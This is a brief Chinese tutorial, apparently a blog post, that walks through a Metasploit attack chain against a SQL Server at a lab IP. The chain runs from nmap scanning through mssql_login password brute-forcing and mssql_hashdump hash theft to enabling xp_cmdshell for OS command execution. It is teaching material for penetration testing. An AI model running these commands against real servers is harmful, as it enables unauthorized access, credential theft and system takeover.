前言
简单介绍了使用metasploit对SQL server进行渗透测试提权
一、使用nmap进行踩点
db_nmap -sV -p1433 1434 192.168.1.106 #使用nmap进行扫描
services #显示出服务
db_namp -sU --script=ms-sql-info -p1434 192.168.1.106 #使用脚本进行扫描,可以获取详细信息
二、使用metasploit进行扫描
use auxiliary/scanner/mssql/mssql_ping #使用msf专用的ms sql扫描模块
options #显示可设置参数
set rhost 192.168.1.106 #设置参数
run #进行扫描
相对于nmap比,msf模块可读性较高
三、破解sqlserver密码
use auxiliary/scanner/mssql/mssql_login #使用msf中对身份验证进行暴力破解的模块
set rhosts 192.168.1.106 #设置参数
run #进行暴力破解
Module options (auxiliary/scanner/mssql/mssql_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 1433 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME sa no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
VERBOSE true yes Whether to print output for all attempts
可以对USER_FILE和PASS_FILE进行设置(导入字典),进行更全面的暴力破解
四、查找服务器其他用户口令
use auxiliary/scanner/mssql/mssql_hashdump #获取服务器其他用户密码的哈希值
options #显示设置
set rhosts 192.168.1.106 #设置参数
run #进行扫描
获得结果后使用第三方工具进行解密,就可以提升权限
五、浏览SQL server
use auxiliary/scanner/mssql/msql_enum
options
set username ....
set password 123456
set rhosts 192.168.1.106
run
六、后渗透
使用mssql_sql模块进行sql查询、使用mssql_exec启用已经被禁用的xp_cmdshell,执行系统级命令
use auxiliary/admin/mssql/mssql_exec #使用exec执行cmd命令
options
set CMD 'ipconfig' #cmd命令
run
使用mssql_sql进行sql语句执行
msf6 > use auxiliary/admin/mssql/mssql_sql
msf6 auxiliary(admin/mssql/mssql_sql) > options
Module options (auxiliary/admin/mssql/mssql_sql):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 1433 yes The target port (TCP)
SQL select @@version no The SQL query to execute
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
msf6 auxiliary(admin/mssql/mssql_sql) >
总结
本文简单介绍了metasploit对SQL server渗透测试提权的基本方法和步骤,仅供学习参考,有问题多多讨论